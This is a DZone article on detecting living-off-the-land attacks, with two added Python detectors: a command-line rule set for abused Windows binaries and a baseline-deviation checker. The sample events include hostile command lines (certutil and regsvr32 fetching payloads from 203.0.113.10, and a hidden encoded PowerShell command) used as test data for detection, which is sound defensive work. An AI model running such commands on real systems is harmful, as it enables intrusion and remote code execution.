How To Detect Living-Off-The-Land (LOTL) Attacks

A living-off-the-land attack is one in which attackers abuse legitimate tools and features that are already present in the environment, instead of bringing their own malware, so that their activity blends in with routine administration. These tips will help detect LOTL attacks.

By Zac Amos · May 01, 2024 · Opinion

Cybercriminals always seek new ways to evade detection and infiltrate networks. What if they could succeed by blending into the environment, so that security tools see nothing but trusted, everyday activity? That is the idea behind living-off-the-land (LOTL) attacks. What should people know about them, and, more importantly, how can they be detected and stopped?

What Is a Living-Off-The-Land Attack?

A living-off-the-land attack occurs when cybercriminals abuse legitimate, already-present tools and features, such as PowerShell, WMI, scheduled tasks, remote administration utilities and signed system binaries, to operate inside a network. Because they want to stay hidden for as long as possible, they avoid dropping malware that signature-based defenses would flag. Every program that runs is one the organization already trusts, so the malicious part lies in who ran it, from where and with which arguments, not in the file itself.

Spotting LOTL Attacks

LOTL detection is tricky because these attacks have no universal signature: the binaries involved are legitimate and often signed, so there is nothing for a file-based scanner to match. Detection therefore rests on context and behaviour, and several things can still tip people off that an attack is in progress.

Unusual Access Control Attempts

Cybercriminals need sufficient privileges to do real damage once inside a system, and acquiring them with built-in tools leaves traces in access control and authentication logs. Patterns such as an account that normally never touches administrative settings suddenly adding members to a privileged group, creating new accounts, changing password policies or being granted special privileges at logon are potential signs of a LOTL attack in progress, especially when the account's owner cannot explain them.

People should watch for such attempts continuously, not only after an incident, and should keep the opportunity for them small: grant individuals access to tools or parts of a system only when they genuinely need them for their work, and review privileged group memberships regularly so that standing administrative rights nobody uses get removed.

Strange Details in Network Logs 

Logs can also hold the first clues of a LOTL attack in progress. However, that is only true if they are detailed enough to separate normal from suspicious use of the same tool: a process-creation record that captures the full command line, the parent process, the user and the host tells an analyst far more than one that merely says certutil.exe ran. Network logs add the other half of the picture, such as a workstation that suddenly opens SMB or WinRM connections to many peers, or an outbound download initiated by a system utility rather than a browser.

Those responsible for the logs must also look at them often enough to notice an attack while it is happening, or shortly afterwards. A common problem is that many security teams only consult logs after an incident has already been discovered, to learn what went wrong and why.

People should get into the habit of reviewing logs regularly, ideally by turning the checks they perform by hand into alerts that run continuously. This is one of the most straightforward ways to detect a living-off-the-land attack.

Information From an Endpoint Detection and Response (EDR) Tool

There is often so much telemetry from a network environment that security teams struggle to separate noise from genuinely concerning events. An endpoint detection and response (EDR) tool collects process, file, registry and network activity from each host and can provide the context needed to spot unusual events potentially connected to a LOTL attack.

People should also tune the EDR's automated rules to flag the specific events that matter in their environment, for example an Office application spawning a command shell, or a system utility fetching a file from the internet. LOTL attacks play out differently from one company to the next, but the more familiar someone is with typical activity on their own network, the easier it is to recognize an anomaly.

Certain tools are more prone to abuse than others. Microsoft-signed binaries and scripts that can download files, decode payloads, execute scripts or proxy the execution of other code are the classic examples; more than 135 of them have documented misuse techniques, and the community-maintained LOLBAS project keeps a catalog that can be turned directly into detection rules.
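As an added example (not code from the article or its author) of turning the log-review advice above and the catalog of abusable signed binaries into something that runs continuously, the script below applies a small set of command-line rules to process-creation events. The event records are constructed to resemble the fields an EDR, Sysmon Event ID 1 or Windows Security Event ID 4688 provides (Image, CommandLine, ParentImage, User); those field names, the rule list and the sample command lines are assumptions for illustration, and the rule list is a starting point rather than a complete catalog.

```python
"""Flag suspicious use of Microsoft-signed binaries in process-creation logs.

Added example for this article, not the author's code. Events are constructed
dicts mimicking EDR / Sysmon (Event ID 1) / Windows 4688 fields; the rules
cover a handful of well-known abuse idioms and are meant to be extended.
"""
import re

# binary -> list of (what the pattern indicates, regex applied to the command line)
LOLBIN_RULES = {
    "certutil.exe": [
        ("download from URL via -urlcache", re.compile(r"-urlcache\b.*https?://", re.I)),
        ("base64 decode of a dropped file", re.compile(r"-decode\b", re.I)),
    ],
    "mshta.exe": [
        ("HTA/script loaded from URL or inline", re.compile(r"https?://|javascript:|vbscript:", re.I)),
    ],
    "rundll32.exe": [
        ("inline script execution", re.compile(r"javascript:|vbscript:", re.I)),
    ],
    "regsvr32.exe": [
        ("scriptlet loaded from URL (scrobj.dll)", re.compile(r"/i:\s*https?://", re.I)),
    ],
    "powershell.exe": [
        ("encoded command", re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", re.I)),
        ("hidden window with download cradle",
         re.compile(r"-w(?:indowstyle)?\s+hidden.*(?:DownloadString|DownloadFile|IEX|Invoke-Expression)", re.I)),
    ],
    "bitsadmin.exe": [
        ("BITS transfer from URL", re.compile(r"/transfer\b.*https?://", re.I)),
    ],
    "wmic.exe": [
        ("process creation through WMI", re.compile(r"process\s+call\s+create", re.I)),
    ],
}

# Office applications normally never launch these tools; when they do it is
# usually a macro or exploit chain, whatever the arguments look like.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def basename(path: str) -> str:
    """Lower-case file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(event: dict) -> list:
    """Return the reasons an event looks like LOLBin abuse (empty list = no finding)."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    reasons = [desc for desc, pat in LOLBIN_RULES.get(image, []) if pat.search(cmd)]
    if image in LOLBIN_RULES and parent in OFFICE_PARENTS:
        reasons.append(f"{image} spawned by Office application {parent}")
    return reasons


def scan(events: list) -> list:
    """Run every event through evaluate(); return (user, image, reasons) for hits."""
    hits = []
    for e in events:
        reasons = evaluate(e)
        if reasons:
            hits.append((e.get("User", "?"), basename(e.get("Image", "")), reasons))
    return hits


# Constructed sample: three suspicious and three benign process-creation events.
SAMPLE_EVENTS = [
    {"User": "CORP\\alice", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"User": "CORP\\alice", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.10/p.txt C:\\Users\\Public\\p.txt"},
    {"User": "CORP\\bob", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://203.0.113.10/a.sct scrobj.dll"},
    {"User": "CORP\\itadmin", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -hashfile C:\\installers\\setup.msi SHA256"},
    {"User": "CORP\\bob", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},
    {"User": "CORP\\itadmin", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for user, image, reasons in scan(SAMPLE_EVENTS):
        print(f"{user:15} {image:15} {'; '.join(reasons)}")
```

The point of the sample is the pairs: the same certutil.exe is flagged when it fetches a URL and ignored when it hashes an installer, and PowerShell is flagged for an encoded command under Word but not for a plain script run by an administrator from cmd.exe. In a SIEM the same logic becomes one rule per entry, with the parent-process check layered on top.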

Establish What Constitutes Baseline Activity

Cybercriminals keep becoming more sophisticated and creative. Even so, the information gathered by following these tips helps people build a picture of what is happening and judge whether an attack is likely in progress.

They should also use these insights in reverse. The best approach is to use all the available information to create an in-depth picture of the network's baseline activity: which accounts run which tools, which processes launch which child processes, which hosts talk to which, and who performs administrative changes. Then create triggers that fire on deviations from that baseline, so that people know when it is time to investigate further and, hopefully, stop an attack or prevent it from getting worse.
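The following is an added example, not the author's code, of the baseline-and-trigger approach just described; it also covers the earlier point about unusual access control attempts, since a privileged group change is just another relation to baseline. It learns which account-to-tool, parent-to-child and account-to-group-change combinations occur during a learning window, then flags later events whose combinations were never seen or were seen on too few distinct days. Events are constructed dicts: process-creation records (User, ParentImage, Image) and group-membership changes modelled loosely on Windows Security Event IDs 4728/4732 (SubjectUser, TargetGroup). The field names, day labels, account names and the two-day support threshold are assumptions for illustration.

```python
"""Baseline-and-deviation triggers for LOTL detection.

Added example for this article, not the author's code. Learns (entity, action)
relations during a learning window and reports later events that fall outside
it. Event field names and the sample data below are constructed.
"""
from collections import defaultdict


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def event_keys(e: dict) -> list:
    """Project one event onto the relations worth baselining."""
    if e["kind"] == "process":
        image, parent = basename(e["Image"]), basename(e["ParentImage"])
        return [("user->image", e["User"], image),        # who runs what
                ("parent->child", parent, image)]          # what spawns what
    if e["kind"] == "group_change":
        return [("user->group-change", e["SubjectUser"], e["TargetGroup"])]  # who touches which group
    return []


class Baseline:
    def __init__(self, min_days: int = 2):
        self.min_days = min_days           # relations seen on fewer days are "rare"
        self.seen = defaultdict(set)       # relation -> set of days it was observed

    def learn(self, events) -> None:
        for e in events:
            for key in event_keys(e):
                self.seen[key].add(e["day"])

    def check(self, e) -> list:
        """Findings for one event: ('never seen' | 'rare', relation)."""
        findings = []
        for key in event_keys(e):
            days = self.seen.get(key, set())   # .get() so checking never pollutes the baseline
            if not days:
                findings.append(("never seen", key))
            elif len(days) < self.min_days:
                findings.append(("rare", key))
        return findings

    def triage(self, events) -> list:
        """(severity, day, findings) for every event with findings, high severity first."""
        out = []
        for e in events:
            f = self.check(e)
            if f:
                severity = "high" if any(k == "never seen" for k, _ in f) else "medium"
                out.append((severity, e["day"], f))
        return sorted(out, key=lambda x: x[0] != "high")


def proc(day, user, parent, image):
    return {"kind": "process", "day": day, "User": user, "ParentImage": parent, "Image": image}


def grp(day, subject, group):
    return {"kind": "group_change", "day": day, "SubjectUser": subject, "TargetGroup": group}


WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
OUTLOOK = r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"
EXPLORER = r"C:\Windows\explorer.exe"
SERVICES = r"C:\Windows\System32\services.exe"
CMD = r"C:\Windows\System32\cmd.exe"
ROBOCOPY = r"C:\Windows\System32\Robocopy.exe"
CERTUTIL = r"C:\Windows\System32\certutil.exe"
WMIC = r"C:\Windows\System32\wbem\WMIC.exe"

# Constructed learning window: two ordinary days of activity.
LEARNING_WINDOW = [
    proc("d1", "alice", EXPLORER, WORD), proc("d1", "alice", EXPLORER, OUTLOOK),
    proc("d2", "alice", EXPLORER, WORD), proc("d2", "alice", EXPLORER, OUTLOOK),
    proc("d1", "svc_backup", SERVICES, CMD), proc("d1", "svc_backup", CMD, ROBOCOPY),
    proc("d2", "svc_backup", SERVICES, CMD), proc("d2", "svc_backup", CMD, ROBOCOPY),
    proc("d2", "itadmin", CMD, CERTUTIL),              # one-off admin use of certutil
    grp("d1", "helpdesk", "Remote Desktop Users"), grp("d2", "helpdesk", "Remote Desktop Users"),
]

# Constructed new day: one routine event, then deviations of differing severity.
NEW_EVENTS = [
    proc("d3", "svc_backup", CMD, ROBOCOPY),   # routine: no finding
    proc("d3", "alice", WORD, WMIC),           # Word spawning wmic: never seen twice over
    proc("d3", "bob", CMD, CERTUTIL),          # bob never ran certutil; cmd->certutil is rare
    grp("d3", "alice", "Administrators"),      # alice never changed any group
    proc("d3", "itadmin", CMD, CERTUTIL),      # known but rare: medium
]

if __name__ == "__main__":
    baseline = Baseline(min_days=2)
    baseline.learn(LEARNING_WINDOW)
    for severity, day, findings in baseline.triage(NEW_EVENTS):
        print(severity, day, findings)
```

The "rare" tier exists because a baseline built from a short window will contain legitimate one-offs; treating them as lower-severity rather than as known-good keeps an administrator's single certutil run from silently whitelisting certutil for everyone. In practice the learning window is rolled forward continuously and the relations are keyed per host as well as per user.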

Cultivate Awareness Within the Organization

Although cybersecurity professionals are usually the first to confirm that a LOTL attack is in progress or has occurred, people throughout a company may notice some of its effects first: a machine that is suddenly slow, an administrator prompt nobody asked for, or a colleague's account doing things its owner denies. A robust but easy-to-follow process for reporting anything unusual is an excellent way to get everyone involved in detecting and curbing potential LOTL attacks. Even if the reporting individual does not directly halt the incident, the information they provide can be instrumental in steering the investigation.

One easy option is an internet-based form people can go to immediately when they notice something strange. If the form takes only a few seconds to complete, users will find it easier to provide all the relevant information. A sensible backup is to keep paper copies as well, in case an attack disrupts internet access.

Another excellent way to raise awareness is to offer a training session that explains LOTL attacks and why they are so much harder to spot than other threats. Once employees understand this, they are more likely to appreciate the importance of reporting anything suspicious quickly.

Expect LOTL Attacks To Evolve

These suggestions help people know what to look for when determining whether a LOTL attack has happened or is in progress. However, every member of the security team must understand that attack methods change continually, precisely to make incidents harder to prevent. Staying abreast of new techniques, and of the new built-in tools that attackers start to abuse, is one of the best ways to cope with this reality.


Opinions expressed by DZone contributors are their own.
